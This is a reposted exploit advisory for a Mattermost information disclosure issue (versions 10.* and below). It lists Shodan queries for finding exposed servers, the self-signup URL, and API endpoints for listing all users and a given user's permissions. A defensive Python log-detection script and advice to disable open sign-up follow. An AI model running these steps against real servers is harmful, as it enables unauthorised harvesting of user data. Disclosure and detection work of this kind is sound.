MatterMost information disclosure
The article describes an information disclosure vulnerability in MatterMost (affecting versions 10.* and below): an attacker locates targets through Shodan, registers an account, and then uses API endpoints to retrieve their own account information, the list of all users, and a specific user's permissions. 2025-9-27 11:24:40 Author: cxsecurity.com (view original)

# Exploit Title: MatterMost information disclosure
# Date: 9/26/2025
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: MatterMost (https://mattermost.com)
# Version: 10.* and below
# Tested on: Linux/Windows

Step 1: An attacker can find targets with these Shodan queries:
https://www.shodan.io/search?query=http.component%3A%22mattermost%22+%22X-Version-Id%3A+10.9.*%22
https://www.shodan.io/search?query=http.component%3A%22mattermost%22+%22X-Version-Id%3A+10.10.1%22

Step 2: The attacker can sign up through this endpoint, for example:
http://TARGET_IP:TARGET_PORT/signup_user_complete

Step 3: After creating an account, the attacker can use these API endpoints to find juicy information:
https://TARGET_URL/api/v4/users/me --> the attacker's own account information
https://TARGET_URL/api/v4/users?per_page=200&page=0 --> list all users (after authentication)
https://TARGET_URL/api/v4/users/username/TARGET_USERNAME --> find a specific user's permissions

Note on per_page: it sets how many users are returned in one page of the list. Send the requests above as GET.
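The sequence above (self-registration followed by bulk listing of /api/v4/users) is a pattern a defender can look for in the reverse proxy or web server access log. The following is an added detection example, not code from the advisory or from Mattermost; the log lines are constructed, the combined-log format is assumed, and the thresholds are illustrative.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Sep/2025:10:01:02 +0000] "POST /signup_user_complete HTTP/1.1" 200 512
203.0.113.5 - - [26/Sep/2025:10:01:40 +0000] "GET /api/v4/users/me HTTP/1.1" 200 734
203.0.113.5 - - [26/Sep/2025:10:01:55 +0000] "GET /api/v4/users?per_page=200&page=0 HTTP/1.1" 200 60211
203.0.113.5 - - [26/Sep/2025:10:02:10 +0000] "GET /api/v4/users?per_page=200&page=1 HTTP/1.1" 200 58790
198.51.100.9 - - [26/Sep/2025:10:05:00 +0000] "GET /api/v4/users/me HTTP/1.1" 200 701
198.51.100.9 - - [26/Sep/2025:10:05:30 +0000] "GET /api/v4/users?per_page=20&page=0 HTTP/1.1" 200 6100
"""

# client ip, method, request target and status code from a combined-log line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Illustrative thresholds (assumptions); tune them to the deployment's normal use.
PER_PAGE_THRESHOLD = 100   # large pages suggest bulk harvesting, not UI browsing
MIN_LIST_PAGES = 2         # walking several pages suggests enumeration

def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlparse(target)
    return {"ip": ip, "method": method, "path": url.path,
            "query": parse_qs(url.query), "status": int(status)}

def find_enumerators(log_text):
    """Return {ip: stats} for sources that touched the signup route and then
    listed users with a large per_page across several pages."""
    stats = defaultdict(lambda: {"signup": False, "list_pages": 0, "max_per_page": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] != 200:
            continue
        s = stats[rec["ip"]]
        if rec["path"] == "/signup_user_complete":      # signup route named in the advisory
            s["signup"] = True
        elif rec["method"] == "GET" and rec["path"] == "/api/v4/users":
            per_page = int(rec["query"].get("per_page", ["0"])[0])  # missing per_page counted as 0
            s["list_pages"] += 1
            s["max_per_page"] = max(s["max_per_page"], per_page)
    return {ip: s for ip, s in stats.items()
            if s["signup"] and s["list_pages"] >= MIN_LIST_PAGES
            and s["max_per_page"] >= PER_PAGE_THRESHOLD}

if __name__ == "__main__":
    for ip, s in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: signed up, then listed users {s['list_pages']} times (per_page={s['max_per_page']})")
```

Disabling open sign-up (or restricting it to approved email domains) removes the precondition for step 2 entirely; the log check above is for instances where self-registration must stay on.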


Source: https://cxsecurity.com/issue/WLB-2025090012